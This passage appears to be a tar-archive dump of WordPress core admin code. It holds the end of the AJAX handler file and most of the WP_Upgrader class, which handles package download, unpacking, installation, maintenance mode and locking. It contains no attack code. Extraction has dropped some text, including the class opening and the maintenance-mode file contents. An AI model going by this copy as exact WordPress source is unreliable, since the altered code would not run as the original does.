wp_send_json_success( $site_health->get_test_loopback_requests() ); } /** * Handles site health check to update the result status via AJAX. * * @since 5.2.0 */ function wp_ajax_health_check_site_status_result() { check_ajax_referer( 'health-check-site-status-result' ); if ( ! current_user_can( 'view_site_health_checks' ) ) { wp_send_json_error(); } set_transient( 'health-check-site-status-result', wp_json_encode( $_POST['counts'] ) ); wp_send_json_success(); } /** * Handles site health check to get directories and database sizes via AJAX. * * @since 5.2.0 * @deprecated 5.6.0 Use WP_REST_Site_Health_Controller::get_directory_sizes() * @see WP_REST_Site_Health_Controller::get_directory_sizes() */ function wp_ajax_health_check_get_sizes() { _doing_it_wrong( 'wp_ajax_health_check_get_sizes', sprintf( /* translators: 1: The Site Health action that is no longer used by core. 2: The new function that replaces it. */ __( 'The Site Health check for %1$s has been replaced with %2$s.' ), 'wp_ajax_health_check_get_sizes', 'WP_REST_Site_Health_Controller::get_directory_sizes' ), '5.6.0' ); check_ajax_referer( 'health-check-site-status-result' ); if ( ! current_user_can( 'view_site_health_checks' ) || is_multisite() ) { wp_send_json_error(); } if ( ! class_exists( 'WP_Debug_Data' ) ) { require_once ABSPATH . 'wp-admin/includes/class-wp-debug-data.php'; } $sizes_data = WP_Debug_Data::get_sizes(); $all_sizes = array( 'raw' => 0 ); foreach ( $sizes_data as $name => $value ) { $name = sanitize_text_field( $name ); $data = array(); if ( isset( $value['size'] ) ) { if ( is_string( $value['size'] ) ) { $data['size'] = sanitize_text_field( $value['size'] ); } else { $data['size'] = (int) $value['size']; } } if ( isset( $value['debug'] ) ) { if ( is_string( $value['debug'] ) ) { $data['debug'] = sanitize_text_field( $value['debug'] ); } else { $data['debug'] = (int) $value['debug']; } } if ( ! empty( $value['raw'] ) ) { $data['raw'] = (int) $value['raw']; } $all_sizes[ $name ] = $data; } if ( isset( $all_sizes['total_size']['debug'] ) && 'not available' === $all_sizes['total_size']['debug'] ) { wp_send_json_error( $all_sizes ); } wp_send_json_success( $all_sizes ); } /** * Handles renewing the REST API nonce via AJAX. * * @since 5.3.0 */ function wp_ajax_rest_nonce() { exit( wp_create_nonce( 'wp_rest' ) ); } /** * Handles enabling or disable plugin and theme auto-updates via AJAX. * * @since 5.5.0 */ function wp_ajax_toggle_auto_updates() { check_ajax_referer( 'updates' ); if ( empty( $_POST['type'] ) || empty( $_POST['asset'] ) || empty( $_POST['state'] ) ) { wp_send_json_error( array( 'error' => __( 'Invalid data. No selected item.' ) ) ); } $asset = sanitize_text_field( urldecode( $_POST['asset'] ) ); if ( 'enable' !== $_POST['state'] && 'disable' !== $_POST['state'] ) { wp_send_json_error( array( 'error' => __( 'Invalid data. Unknown state.' ) ) ); } $state = $_POST['state']; if ( 'plugin' !== $_POST['type'] && 'theme' !== $_POST['type'] ) { wp_send_json_error( array( 'error' => __( 'Invalid data. Unknown type.' ) ) ); } $type = $_POST['type']; switch ( $type ) { case 'plugin': if ( ! current_user_can( 'update_plugins' ) ) { $error_message = __( 'Sorry, you are not allowed to modify plugins.' ); wp_send_json_error( array( 'error' => $error_message ) ); } $option = 'auto_update_plugins'; /** This filter is documented in wp-admin/includes/class-wp-plugins-list-table.php */ $all_items = apply_filters( 'all_plugins', get_plugins() ); break; case 'theme': if ( ! current_user_can( 'update_themes' ) ) { $error_message = __( 'Sorry, you are not allowed to modify themes.' ); wp_send_json_error( array( 'error' => $error_message ) ); } $option = 'auto_update_themes'; $all_items = wp_get_themes(); break; default: wp_send_json_error( array( 'error' => __( 'Invalid data. Unknown type.' ) ) ); } if ( ! array_key_exists( $asset, $all_items ) ) { $error_message = __( 'Invalid data. The item does not exist.' ); wp_send_json_error( array( 'error' => $error_message ) ); } $auto_updates = (array) get_site_option( $option, array() ); if ( 'disable' === $state ) { $auto_updates = array_diff( $auto_updates, array( $asset ) ); } else { $auto_updates[] = $asset; $auto_updates = array_unique( $auto_updates ); } // Remove items that have been deleted since the site option was last updated. $auto_updates = array_intersect( $auto_updates, array_keys( $all_items ) ); update_site_option( $option, $auto_updates ); wp_send_json_success(); } /** * Handles sending a password reset link via AJAX. * * @since 5.7.0 */ function wp_ajax_send_password_reset() { // Validate the nonce for this action. $user_id = isset( $_POST['user_id'] ) ? (int) $_POST['user_id'] : 0; check_ajax_referer( 'reset-password-for-' . $user_id, 'nonce' ); // Verify user capabilities. if ( ! current_user_can( 'edit_user', $user_id ) ) { wp_send_json_error( __( 'Cannot send password reset, permission denied.' ) ); } // Send the password reset link. $user = get_userdata( $user_id ); $results = retrieve_password( $user->user_login ); if ( true === $results ) { wp_send_json_success( /* translators: %s: User's display name. */ sprintf( __( 'A password reset link was emailed to %s.' ), $user->display_name ) ); } else { wp_send_json_error( $results->get_error_message() ); } } includes/class-wp-upgrader.php000064400000135551152075237570012452 0ustar00skin = new WP_Upgrader_Skin(); } else { $this->skin = $skin; } } /** * Initializes the upgrader. * * This will set the relationship between the skin being used and this upgrader, * and also add the generic strings to `WP_Upgrader::$strings`. * * Additionally, it will schedule a weekly task to clean up the temporary backup directory. * * @since 2.8.0 * @since 6.3.0 Added the `schedule_temp_backup_cleanup()` task. */ public function init() { $this->skin->set_upgrader( $this ); $this->generic_strings(); if ( ! wp_installing() ) { $this->schedule_temp_backup_cleanup(); } } /** * Schedules the cleanup of the temporary backup directory. * * @since 6.3.0 */ protected function schedule_temp_backup_cleanup() { if ( false === wp_next_scheduled( 'wp_delete_temp_updater_backups' ) ) { wp_schedule_event( time(), 'weekly', 'wp_delete_temp_updater_backups' ); } } /** * Adds the generic strings to WP_Upgrader::$strings. * * @since 2.8.0 */ public function generic_strings() { $this->strings['bad_request'] = __( 'Invalid data provided.' ); $this->strings['fs_unavailable'] = __( 'Could not access filesystem.' ); $this->strings['fs_error'] = __( 'Filesystem error.' ); $this->strings['fs_no_root_dir'] = __( 'Unable to locate WordPress root directory.' ); /* translators: %s: Directory name. */ $this->strings['fs_no_content_dir'] = sprintf( __( 'Unable to locate WordPress content directory (%s).' ), 'wp-content' ); $this->strings['fs_no_plugins_dir'] = __( 'Unable to locate WordPress plugin directory.' ); $this->strings['fs_no_themes_dir'] = __( 'Unable to locate WordPress theme directory.' ); /* translators: %s: Directory name. */ $this->strings['fs_no_folder'] = __( 'Unable to locate needed folder (%s).' ); $this->strings['no_package'] = __( 'Package not available.' ); $this->strings['download_failed'] = __( 'Download failed.' ); $this->strings['installing_package'] = __( 'Installing the latest version…' ); $this->strings['no_files'] = __( 'The package contains no files.' ); $this->strings['folder_exists'] = __( 'Destination folder already exists.' ); $this->strings['mkdir_failed'] = __( 'Could not create directory.' ); $this->strings['incompatible_archive'] = __( 'The package could not be installed.' ); $this->strings['files_not_writable'] = __( 'The update cannot be installed because some files could not be copied. This is usually due to inconsistent file permissions.' ); $this->strings['dir_not_readable'] = __( 'A directory could not be read.' ); $this->strings['maintenance_start'] = __( 'Enabling Maintenance mode…' ); $this->strings['maintenance_end'] = __( 'Disabling Maintenance mode…' ); /* translators: %s: upgrade-temp-backup */ $this->strings['temp_backup_mkdir_failed'] = sprintf( __( 'Could not create the %s directory.' ), 'upgrade-temp-backup' ); /* translators: %s: upgrade-temp-backup */ $this->strings['temp_backup_move_failed'] = sprintf( __( 'Could not move the old version to the %s directory.' ), 'upgrade-temp-backup' ); /* translators: %s: The plugin or theme slug. */ $this->strings['temp_backup_restore_failed'] = __( 'Could not restore the original version of %s.' ); /* translators: %s: The plugin or theme slug. */ $this->strings['temp_backup_delete_failed'] = __( 'Could not delete the temporary backup directory for %s.' ); } /** * Connects to the filesystem. * * @since 2.8.0 * * @global WP_Filesystem_Base $wp_filesystem WordPress filesystem subclass. * * @param string[] $directories Optional. Array of directories. If any of these do * not exist, a WP_Error object will be returned. * Default empty array. * @param bool $allow_relaxed_file_ownership Whether to allow relaxed file ownership. * Default false. * @return bool|WP_Error True if able to connect, false or a WP_Error otherwise. */ public function fs_connect( $directories = array(), $allow_relaxed_file_ownership = false ) { global $wp_filesystem; $credentials = $this->skin->request_filesystem_credentials( false, $directories[0], $allow_relaxed_file_ownership ); if ( false === $credentials ) { return false; } if ( ! WP_Filesystem( $credentials, $directories[0], $allow_relaxed_file_ownership ) ) { $error = true; if ( is_object( $wp_filesystem ) && $wp_filesystem->errors->has_errors() ) { $error = $wp_filesystem->errors; } // Failed to connect. Error and request again. $this->skin->request_filesystem_credentials( $error, $directories[0], $allow_relaxed_file_ownership ); return false; } if ( ! is_object( $wp_filesystem ) ) { return new WP_Error( 'fs_unavailable', $this->strings['fs_unavailable'] ); } if ( is_wp_error( $wp_filesystem->errors ) && $wp_filesystem->errors->has_errors() ) { return new WP_Error( 'fs_error', $this->strings['fs_error'], $wp_filesystem->errors ); } foreach ( (array) $directories as $dir ) { switch ( $dir ) { case ABSPATH: if ( ! $wp_filesystem->abspath() ) { return new WP_Error( 'fs_no_root_dir', $this->strings['fs_no_root_dir'] ); } break; case WP_CONTENT_DIR: if ( ! $wp_filesystem->wp_content_dir() ) { return new WP_Error( 'fs_no_content_dir', $this->strings['fs_no_content_dir'] ); } break; case WP_PLUGIN_DIR: if ( ! $wp_filesystem->wp_plugins_dir() ) { return new WP_Error( 'fs_no_plugins_dir', $this->strings['fs_no_plugins_dir'] ); } break; case get_theme_root(): if ( ! $wp_filesystem->wp_themes_dir() ) { return new WP_Error( 'fs_no_themes_dir', $this->strings['fs_no_themes_dir'] ); } break; default: if ( ! $wp_filesystem->find_folder( $dir ) ) { return new WP_Error( 'fs_no_folder', sprintf( $this->strings['fs_no_folder'], esc_html( basename( $dir ) ) ) ); } break; } } return true; } /** * Downloads a package. * * @since 2.8.0 * @since 5.2.0 Added the `$check_signatures` parameter. * @since 5.5.0 Added the `$hook_extra` parameter. * * @param string $package The URI of the package. If this is the full path to an * existing local file, it will be returned untouched. * @param bool $check_signatures Whether to validate file signatures. Default false. * @param array $hook_extra Extra arguments to pass to the filter hooks. Default empty array. * @return string|WP_Error The full path to the downloaded package file, or a WP_Error object. */ public function download_package( $package, $check_signatures = false, $hook_extra = array() ) { /** * Filters whether to return the package. * * @since 3.7.0 * @since 5.5.0 Added the `$hook_extra` parameter. * * @param bool $reply Whether to bail without returning the package. * Default false. * @param string $package The package file name. * @param WP_Upgrader $upgrader The WP_Upgrader instance. * @param array $hook_extra Extra arguments passed to hooked filters. */ $reply = apply_filters( 'upgrader_pre_download', false, $package, $this, $hook_extra ); if ( false !== $reply ) { return $reply; } if ( ! preg_match( '!^(http|https|ftp)://!i', $package ) && file_exists( $package ) ) { // Local file or remote? return $package; // Must be a local file. } if ( empty( $package ) ) { return new WP_Error( 'no_package', $this->strings['no_package'] ); } $this->skin->feedback( 'downloading_package', $package ); $download_file = download_url( $package, 300, $check_signatures ); if ( is_wp_error( $download_file ) && ! $download_file->get_error_data( 'softfail-filename' ) ) { return new WP_Error( 'download_failed', $this->strings['download_failed'], $download_file->get_error_message() ); } return $download_file; } /** * Unpacks a compressed package file. * * @since 2.8.0 * * @global WP_Filesystem_Base $wp_filesystem WordPress filesystem subclass. * * @param string $package Full path to the package file. * @param bool $delete_package Optional. Whether to delete the package file after attempting * to unpack it. Default true. * @return string|WP_Error The path to the unpacked contents, or a WP_Error on failure. */ public function unpack_package( $package, $delete_package = true ) { global $wp_filesystem; $this->skin->feedback( 'unpack_package' ); if ( ! $wp_filesystem->wp_content_dir() ) { return new WP_Error( 'fs_no_content_dir', $this->strings['fs_no_content_dir'] ); } $upgrade_folder = $wp_filesystem->wp_content_dir() . 'upgrade/'; // Clean up contents of upgrade directory beforehand. $upgrade_files = $wp_filesystem->dirlist( $upgrade_folder ); if ( ! empty( $upgrade_files ) ) { foreach ( $upgrade_files as $file ) { $wp_filesystem->delete( $upgrade_folder . $file['name'], true ); } } // We need a working directory - strip off any .tmp or .zip suffixes. $working_dir = $upgrade_folder . basename( basename( $package, '.tmp' ), '.zip' ); // Clean up working directory. if ( $wp_filesystem->is_dir( $working_dir ) ) { $wp_filesystem->delete( $working_dir, true ); } // Unzip package to working directory. $result = unzip_file( $package, $working_dir ); // Once extracted, delete the package if required. if ( $delete_package ) { unlink( $package ); } if ( is_wp_error( $result ) ) { $wp_filesystem->delete( $working_dir, true ); if ( 'incompatible_archive' === $result->get_error_code() ) { return new WP_Error( 'incompatible_archive', $this->strings['incompatible_archive'], $result->get_error_data() ); } return $result; } return $working_dir; } /** * Flattens the results of WP_Filesystem_Base::dirlist() for iterating over. * * @since 4.9.0 * * @param array $nested_files Array of files as returned by WP_Filesystem_Base::dirlist(). * @param string $path Relative path to prepend to child nodes. Optional. * @return array A flattened array of the $nested_files specified. */ protected function flatten_dirlist( $nested_files, $path = '' ) { $files = array(); foreach ( $nested_files as $name => $details ) { $files[ $path . $name ] = $details; // Append children recursively. if ( ! empty( $details['files'] ) ) { $children = $this->flatten_dirlist( $details['files'], $path . $name . '/' ); // Merge keeping possible numeric keys, which array_merge() will reindex from 0..n. $files = $files + $children; } } return $files; } /** * Clears the directory where this item is going to be installed into. * * @since 4.3.0 * * @global WP_Filesystem_Base $wp_filesystem WordPress filesystem subclass. * * @param string $remote_destination The location on the remote filesystem to be cleared. * @return true|WP_Error True upon success, WP_Error on failure. */ public function clear_destination( $remote_destination ) { global $wp_filesystem; $files = $wp_filesystem->dirlist( $remote_destination, true, true ); // False indicates that the $remote_destination doesn't exist. if ( false === $files ) { return true; } // Flatten the file list to iterate over. $files = $this->flatten_dirlist( $files ); // Check all files are writable before attempting to clear the destination. $unwritable_files = array(); // Check writability. foreach ( $files as $filename => $file_details ) { if ( ! $wp_filesystem->is_writable( $remote_destination . $filename ) ) { // Attempt to alter permissions to allow writes and try again. $wp_filesystem->chmod( $remote_destination . $filename, ( 'd' === $file_details['type'] ? FS_CHMOD_DIR : FS_CHMOD_FILE ) ); if ( ! $wp_filesystem->is_writable( $remote_destination . $filename ) ) { $unwritable_files[] = $filename; } } } if ( ! empty( $unwritable_files ) ) { return new WP_Error( 'files_not_writable', $this->strings['files_not_writable'], implode( ', ', $unwritable_files ) ); } if ( ! $wp_filesystem->delete( $remote_destination, true ) ) { return new WP_Error( 'remove_old_failed', $this->strings['remove_old_failed'] ); } return true; } /** * Install a package. * * Copies the contents of a package from a source directory, and installs them in * a destination directory. Optionally removes the source. It can also optionally * clear out the destination folder if it already exists. * * @since 2.8.0 * @since 6.2.0 Use move_dir() instead of copy_dir() when possible. * * @global WP_Filesystem_Base $wp_filesystem WordPress filesystem subclass. * @global string[] $wp_theme_directories * * @param array|string $args { * Optional. Array or string of arguments for installing a package. Default empty array. * * @type string $source Required path to the package source. Default empty. * @type string $destination Required path to a folder to install the package in. * Default empty. * @type bool $clear_destination Whether to delete any files already in the destination * folder. Default false. * @type bool $clear_working Whether to delete the files from the working directory * after copying them to the destination. Default false. * @type bool $abort_if_destination_exists Whether to abort the installation if * the destination folder already exists. Default true. * @type array $hook_extra Extra arguments to pass to the filter hooks called by * WP_Upgrader::install_package(). Default empty array. * } * * @return array|WP_Error The result (also stored in `WP_Upgrader::$result`), or a WP_Error on failure. */ public function install_package( $args = array() ) { global $wp_filesystem, $wp_theme_directories; $defaults = array( 'source' => '', // Please always pass this. 'destination' => '', // ...and this. 'clear_destination' => false, 'clear_working' => false, 'abort_if_destination_exists' => true, 'hook_extra' => array(), ); $args = wp_parse_args( $args, $defaults ); // These were previously extract()'d. $source = $args['source']; $destination = $args['destination']; $clear_destination = $args['clear_destination']; /* * Give the upgrade an additional 300 seconds (5 minutes) to ensure the install * doesn't prematurely timeout having used up the maximum script execution time * upacking and downloading in WP_Upgrader->run(). */ if ( function_exists( 'set_time_limit' ) ) { set_time_limit( 300 ); } if ( ( ! is_string( $source ) || '' === $source || trim( $source ) !== $source ) || ( ! is_string( $destination ) || '' === $destination || trim( $destination ) !== $destination ) ) { return new WP_Error( 'bad_request', $this->strings['bad_request'] ); } $this->skin->feedback( 'installing_package' ); /** * Filters the installation response before the installation has started. * * Returning a value that could be evaluated as a `WP_Error` will effectively * short-circuit the installation, returning that value instead. * * @since 2.8.0 * * @param bool|WP_Error $response Installation response. * @param array $hook_extra Extra arguments passed to hooked filters. */ $res = apply_filters( 'upgrader_pre_install', true, $args['hook_extra'] ); if ( is_wp_error( $res ) ) { return $res; } // Retain the original source and destinations. $remote_source = $args['source']; $local_destination = $destination; $dirlist = $wp_filesystem->dirlist( $remote_source ); if ( false === $dirlist ) { return new WP_Error( 'source_read_failed', $this->strings['fs_error'], $this->strings['dir_not_readable'] ); } $source_files = array_keys( $dirlist ); $remote_destination = $wp_filesystem->find_folder( $local_destination ); // Locate which directory to copy to the new folder. This is based on the actual folder holding the files. if ( 1 === count( $source_files ) && $wp_filesystem->is_dir( trailingslashit( $args['source'] ) . $source_files[0] . '/' ) ) { // Only one folder? Then we want its contents. $source = trailingslashit( $args['source'] ) . trailingslashit( $source_files[0] ); } elseif ( 0 === count( $source_files ) ) { // There are no files? return new WP_Error( 'incompatible_archive_empty', $this->strings['incompatible_archive'], $this->strings['no_files'] ); } else { /* * It's only a single file, the upgrader will use the folder name of this file as the destination folder. * Folder name is based on zip filename. */ $source = trailingslashit( $args['source'] ); } /** * Filters the source file location for the upgrade package. * * @since 2.8.0 * @since 4.4.0 The $hook_extra parameter became available. * * @param string $source File source location. * @param string $remote_source Remote file source location. * @param WP_Upgrader $upgrader WP_Upgrader instance. * @param array $hook_extra Extra arguments passed to hooked filters. */ $source = apply_filters( 'upgrader_source_selection', $source, $remote_source, $this, $args['hook_extra'] ); if ( is_wp_error( $source ) ) { return $source; } if ( ! empty( $args['hook_extra']['temp_backup'] ) ) { $temp_backup = $this->move_to_temp_backup_dir( $args['hook_extra']['temp_backup'] ); if ( is_wp_error( $temp_backup ) ) { return $temp_backup; } $this->temp_backups[] = $args['hook_extra']['temp_backup']; } // Has the source location changed? If so, we need a new source_files list. if ( $source !== $remote_source ) { $dirlist = $wp_filesystem->dirlist( $source ); if ( false === $dirlist ) { return new WP_Error( 'new_source_read_failed', $this->strings['fs_error'], $this->strings['dir_not_readable'] ); } $source_files = array_keys( $dirlist ); } /* * Protection against deleting files in any important base directories. * Theme_Upgrader & Plugin_Upgrader also trigger this, as they pass the * destination directory (WP_PLUGIN_DIR / wp-content/themes) intending * to copy the directory into the directory, whilst they pass the source * as the actual files to copy. */ $protected_directories = array( ABSPATH, WP_CONTENT_DIR, WP_PLUGIN_DIR, WP_CONTENT_DIR . '/themes' ); if ( is_array( $wp_theme_directories ) ) { $protected_directories = array_merge( $protected_directories, $wp_theme_directories ); } if ( in_array( $destination, $protected_directories, true ) ) { $remote_destination = trailingslashit( $remote_destination ) . trailingslashit( basename( $source ) ); $destination = trailingslashit( $destination ) . trailingslashit( basename( $source ) ); } if ( $clear_destination ) { // We're going to clear the destination if there's something there. $this->skin->feedback( 'remove_old' ); $removed = $this->clear_destination( $remote_destination ); /** * Filters whether the upgrader cleared the destination. * * @since 2.8.0 * * @param true|WP_Error $removed Whether the destination was cleared. * True upon success, WP_Error on failure. * @param string $local_destination The local package destination. * @param string $remote_destination The remote package destination. * @param array $hook_extra Extra arguments passed to hooked filters. */ $removed = apply_filters( 'upgrader_clear_destination', $removed, $local_destination, $remote_destination, $args['hook_extra'] ); if ( is_wp_error( $removed ) ) { return $removed; } } elseif ( $args['abort_if_destination_exists'] && $wp_filesystem->exists( $remote_destination ) ) { /* * If we're not clearing the destination folder and something exists there already, bail. * But first check to see if there are actually any files in the folder. */ $_files = $wp_filesystem->dirlist( $remote_destination ); if ( ! empty( $_files ) ) { $wp_filesystem->delete( $remote_source, true ); // Clear out the source files. return new WP_Error( 'folder_exists', $this->strings['folder_exists'], $remote_destination ); } } /* * If 'clear_working' is false, the source should not be removed, so use copy_dir() instead. * * Partial updates, like language packs, may want to retain the destination. * If the destination exists or has contents, this may be a partial update, * and the destination should not be removed, so use copy_dir() instead. */ if ( $args['clear_working'] && ( // Destination does not exist or has no contents. ! $wp_filesystem->exists( $remote_destination ) || empty( $wp_filesystem->dirlist( $remote_destination ) ) ) ) { $result = move_dir( $source, $remote_destination, true ); } else { // Create destination if needed. if ( ! $wp_filesystem->exists( $remote_destination ) ) { if ( ! $wp_filesystem->mkdir( $remote_destination, FS_CHMOD_DIR ) ) { return new WP_Error( 'mkdir_failed_destination', $this->strings['mkdir_failed'], $remote_destination ); } } $result = copy_dir( $source, $remote_destination ); } // Clear the working directory? if ( $args['clear_working'] ) { $wp_filesystem->delete( $remote_source, true ); } if ( is_wp_error( $result ) ) { return $result; } $destination_name = basename( str_replace( $local_destination, '', $destination ) ); if ( '.' === $destination_name ) { $destination_name = ''; } $this->result = compact( 'source', 'source_files', 'destination', 'destination_name', 'local_destination', 'remote_destination', 'clear_destination' ); /** * Filters the installation response after the installation has finished. * * @since 2.8.0 * * @param bool $response Installation response. * @param array $hook_extra Extra arguments passed to hooked filters. * @param array $result Installation result data. */ $res = apply_filters( 'upgrader_post_install', true, $args['hook_extra'], $this->result ); if ( is_wp_error( $res ) ) { $this->result = $res; return $res; } // Bombard the calling function will all the info which we've just used. return $this->result; } /** * Runs an upgrade/installation. * * Attempts to download the package (if it is not a local file), unpack it, and * install it in the destination folder. * * @since 2.8.0 * * @param array $options { * Array or string of arguments for upgrading/installing a package. * * @type string $package The full path or URI of the package to install. * Default empty. * @type string $destination The full path to the destination folder. * Default empty. * @type bool $clear_destination Whether to delete any files already in the * destination folder. Default false. * @type bool $clear_working Whether to delete the files from the working * directory after copying them to the destination. * Default true. * @type bool $abort_if_destination_exists Whether to abort the installation if the destination * folder already exists. When true, `$clear_destination` * should be false. Default true. * @type bool $is_multi Whether this run is one of multiple upgrade/installation * actions being performed in bulk. When true, the skin * WP_Upgrader::header() and WP_Upgrader::footer() * aren't called. Default false. * @type array $hook_extra Extra arguments to pass to the filter hooks called by * WP_Upgrader::run(). * } * @return array|false|WP_Error The result from self::install_package() on success, otherwise a WP_Error, * or false if unable to connect to the filesystem. */ public function run( $options ) { $defaults = array( 'package' => '', // Please always pass this. 'destination' => '', // ...and this. 'clear_destination' => false, 'clear_working' => true, 'abort_if_destination_exists' => true, // Abort if the destination directory exists. Pass clear_destination as false please. 'is_multi' => false, 'hook_extra' => array(), // Pass any extra $hook_extra args here, this will be passed to any hooked filters. ); $options = wp_parse_args( $options, $defaults ); /** * Filters the package options before running an update. * * See also {@see 'upgrader_process_complete'}. * * @since 4.3.0 * * @param array $options { * Options used by the upgrader. * * @type string $package Package for update. * @type string $destination Update location. * @type bool $clear_destination Clear the destination resource. * @type bool $clear_working Clear the working resource. * @type bool $abort_if_destination_exists Abort if the Destination directory exists. * @type bool $is_multi Whether the upgrader is running multiple times. * @type array $hook_extra { * Extra hook arguments. * * @type string $action Type of action. Default 'update'. * @type string $type Type of update process. Accepts 'plugin', 'theme', or 'core'. * @type bool $bulk Whether the update process is a bulk update. Default true. * @type string $plugin Path to the plugin file relative to the plugins directory. * @type string $theme The stylesheet or template name of the theme. * @type string $language_update_type The language pack update type. Accepts 'plugin', 'theme', * or 'core'. * @type object $language_update The language pack update offer. * } * } */ $options = apply_filters( 'upgrader_package_options', $options ); if ( ! $options['is_multi'] ) { // Call $this->header separately if running multiple times. $this->skin->header(); } // Connect to the filesystem first. $res = $this->fs_connect( array( WP_CONTENT_DIR, $options['destination'] ) ); // Mainly for non-connected filesystem. if ( ! $res ) { if ( ! $options['is_multi'] ) { $this->skin->footer(); } return false; } $this->skin->before(); if ( is_wp_error( $res ) ) { $this->skin->error( $res ); $this->skin->after(); if ( ! $options['is_multi'] ) { $this->skin->footer(); } return $res; } /* * Download the package. Note: If the package is the full path * to an existing local file, it will be returned untouched. */ $download = $this->download_package( $options['package'], false, $options['hook_extra'] ); /* * Allow for signature soft-fail. * WARNING: This may be removed in the future. */ if ( is_wp_error( $download ) && $download->get_error_data( 'softfail-filename' ) ) { // Don't output the 'no signature could be found' failure message for now. if ( 'signature_verification_no_signature' !== $download->get_error_code() || WP_DEBUG ) { // Output the failure error as a normal feedback, and not as an error. $this->skin->feedback( $download->get_error_message() ); // Report this failure back to WordPress.org for debugging purposes. wp_version_check( array( 'signature_failure_code' => $download->get_error_code(), 'signature_failure_data' => $download->get_error_data(), ) ); } // Pretend this error didn't happen. $download = $download->get_error_data( 'softfail-filename' ); } if ( is_wp_error( $download ) ) { $this->skin->error( $download ); $this->skin->after(); if ( ! $options['is_multi'] ) { $this->skin->footer(); } return $download; } $delete_package = ( $download !== $options['package'] ); // Do not delete a "local" file. // Unzips the file into a temporary directory. $working_dir = $this->unpack_package( $download, $delete_package ); if ( is_wp_error( $working_dir ) ) { $this->skin->error( $working_dir ); $this->skin->after(); if ( ! $options['is_multi'] ) { $this->skin->footer(); } return $working_dir; } // With the given options, this installs it to the destination directory. $result = $this->install_package( array( 'source' => $working_dir, 'destination' => $options['destination'], 'clear_destination' => $options['clear_destination'], 'abort_if_destination_exists' => $options['abort_if_destination_exists'], 'clear_working' => $options['clear_working'], 'hook_extra' => $options['hook_extra'], ) ); /** * Filters the result of WP_Upgrader::install_package(). * * @since 5.7.0 * * @param array|WP_Error $result Result from WP_Upgrader::install_package(). * @param array $hook_extra Extra arguments passed to hooked filters. */ $result = apply_filters( 'upgrader_install_package_result', $result, $options['hook_extra'] ); $this->skin->set_result( $result ); if ( is_wp_error( $result ) ) { // An automatic plugin update will have already performed its rollback. if ( ! empty( $options['hook_extra']['temp_backup'] ) ) { $this->temp_restores[] = $options['hook_extra']['temp_backup']; /* * Restore the backup on shutdown. * Actions running on `shutdown` are immune to PHP timeouts, * so in case the failure was due to a PHP timeout, * it will still be able to properly restore the previous version. * * Zero arguments are accepted as a string can sometimes be passed * internally during actions, causing an error because * `WP_Upgrader::restore_temp_backup()` expects an array. */ add_action( 'shutdown', array( $this, 'restore_temp_backup' ), 10, 0 ); } $this->skin->error( $result ); if ( ! method_exists( $this->skin, 'hide_process_failed' ) || ! $this->skin->hide_process_failed( $result ) ) { $this->skin->feedback( 'process_failed' ); } } else { // Installation succeeded. $this->skin->feedback( 'process_success' ); } $this->skin->after(); // Clean up the backup kept in the temporary backup directory. if ( ! empty( $options['hook_extra']['temp_backup'] ) ) { // Delete the backup on `shutdown` to avoid a PHP timeout. add_action( 'shutdown', array( $this, 'delete_temp_backup' ), 100, 0 ); } if ( ! $options['is_multi'] ) { /** * Fires when the upgrader process is complete. * * See also {@see 'upgrader_package_options'}. * * @since 3.6.0 * @since 3.7.0 Added to WP_Upgrader::run(). * @since 4.6.0 `$translations` was added as a possible argument to `$hook_extra`. * * @param WP_Upgrader $upgrader WP_Upgrader instance. In other contexts this might be a * Theme_Upgrader, Plugin_Upgrader, Core_Upgrade, or Language_Pack_Upgrader instance. * @param array $hook_extra { * Array of bulk item update data. * * @type string $action Type of action. Default 'update'. * @type string $type Type of update process. Accepts 'plugin', 'theme', 'translation', or 'core'. * @type bool $bulk Whether the update process is a bulk update. Default true. * @type array $plugins Array of the basename paths of the plugins' main files. * @type array $themes The theme slugs. * @type array $translations { * Array of translations update data. * * @type string $language The locale the translation is for. * @type string $type Type of translation. Accepts 'plugin', 'theme', or 'core'. * @type string $slug Text domain the translation is for. The slug of a theme/plugin or * 'default' for core translations. * @type string $version The version of a theme, plugin, or core. * } * } */ do_action( 'upgrader_process_complete', $this, $options['hook_extra'] ); $this->skin->footer(); } return $result; } /** * Toggles maintenance mode for the site. * * Creates/deletes the maintenance file to enable/disable maintenance mode. * * @since 2.8.0 * * @global WP_Filesystem_Base $wp_filesystem WordPress filesystem subclass. * * @param bool $enable True to enable maintenance mode, false to disable. */ public function maintenance_mode( $enable = false ) { global $wp_filesystem; if ( ! $wp_filesystem ) { if ( ! function_exists( 'WP_Filesystem' ) ) { require_once ABSPATH . 'wp-admin/includes/file.php'; } ob_start(); $credentials = request_filesystem_credentials( '' ); ob_end_clean(); if ( false === $credentials || ! WP_Filesystem( $credentials ) ) { wp_trigger_error( __FUNCTION__, __( 'Could not access filesystem.' ) ); return; } } $file = $wp_filesystem->abspath() . '.maintenance'; if ( $enable ) { if ( ! wp_doing_cron() ) { $this->skin->feedback( 'maintenance_start' ); } // Create maintenance file to signal that we are upgrading. $maintenance_string = ''; $wp_filesystem->delete( $file ); $wp_filesystem->put_contents( $file, $maintenance_string, FS_CHMOD_FILE ); } elseif ( $wp_filesystem->exists( $file ) ) { if ( ! wp_doing_cron() ) { $this->skin->feedback( 'maintenance_end' ); } $wp_filesystem->delete( $file ); } } /** * Creates a lock using WordPress options. * * @since 4.5.0 * * @global wpdb $wpdb The WordPress database abstraction object. * * @param string $lock_name The name of this unique lock. * @param int $release_timeout Optional. The duration in seconds to respect an existing lock. * Default: 1 hour. * @return bool False if a lock couldn't be created or if the lock is still valid. True otherwise. */ public static function create_lock( $lock_name, $release_timeout = null ) { global $wpdb; if ( ! $release_timeout ) { $release_timeout = HOUR_IN_SECONDS; } $lock_option = $lock_name . '.lock'; // Try to lock. $lock_result = $wpdb->query( $wpdb->prepare( "INSERT IGNORE INTO `$wpdb->options` ( `option_name`, `option_value`, `autoload` ) VALUES (%s, %s, 'off') /* LOCK */", $lock_option, time() ) ); if ( ! $lock_result ) { $lock_result = get_option( $lock_option ); // If a lock couldn't be created, and there isn't a lock, bail. if ( ! $lock_result ) { return false; } // Check to see if the lock is still valid. If it is, bail. if ( $lock_result > ( time() - $release_timeout ) ) { return false; } // There must exist an expired lock, clear it and re-gain it. WP_Upgrader::release_lock( $lock_name ); return WP_Upgrader::create_lock( $lock_name, $release_timeout ); } // Update the lock, as by this point we've definitely got a lock, just need to fire the actions. update_option( $lock_option, time(), false ); return true; } /** * Releases an upgrader lock. * * @since 4.5.0 * * @see WP_Upgrader::create_lock() * * @param string $lock_name The name of this unique lock. * @return bool True if the lock was successfully released. False on failure. */ public static function release_lock( $lock_name ) { return delete_option( $lock_name 